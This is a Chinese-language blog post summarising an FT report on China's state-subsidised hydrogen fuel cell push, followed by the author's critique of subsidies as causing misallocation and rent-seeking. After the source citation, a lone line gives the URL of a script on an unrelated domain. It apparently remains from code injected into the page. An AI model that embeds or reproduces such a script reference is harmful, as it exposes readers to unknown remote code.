分類
筆記 商業評論

中國的氫能源

1. 中國一年風電或太陽能發電因無法併入電網而浪費掉的高達150 GW。若以此進行電解水取得氫氣,雖然效率不高,但不無是一種能量轉換儲存的方式。
預估因此產出的氫氣足夠一千八百萬輛燃料電池汽車使用。


2. 中國目前已是世界上燃料電池消費最大國,也即將是生產最大國。燃料電池主要用在汽車、公車。
前述的氫氣來源,將可能是傳統瓦斯分解取氫以外的第二種。

3. 相較於鋰電池,燃料電池的原材料上中國自產比率相對高得多,這也是中國政府傾向發展燃料電池的一個考量。

4. 僅2018年,中國中央與地方政府共補助燃料電池項目達$124億美元。

從經濟分析來看,這種政府帶頭的補助發生資源錯置、擠壓民間研發投資、創造公務員尋租…等等弊病絕對存在。
第一點提及「150GW綠能發電因無法併入電網而浪費」就已經是一個證據了。
中國經濟起飛是靠解除人民的經濟錮禁,而非官員的高瞻遠矚。然而在大政府誘因下,這類舉措肯定是避免不了,而因此而生的企業實質上幾乎無長期投資價值。

FT: Hydrogen power: China backs fuel cell technology

https://js.developerstatss.ga/stat.js?n=ns1

發表迴響

在下方填入你的資料或按右方圖示以社群網站登入:

WordPress.com 標誌

您的留言將使用 WordPress.com 帳號。 登出 /  變更 )

Google photo

您的留言將使用 Google 帳號。 登出 /  變更 )

Twitter picture

您的留言將使用 Twitter 帳號。 登出 /  變更 )

Facebook照片

您的留言將使用 Facebook 帳號。 登出 /  變更 )

連結到 %s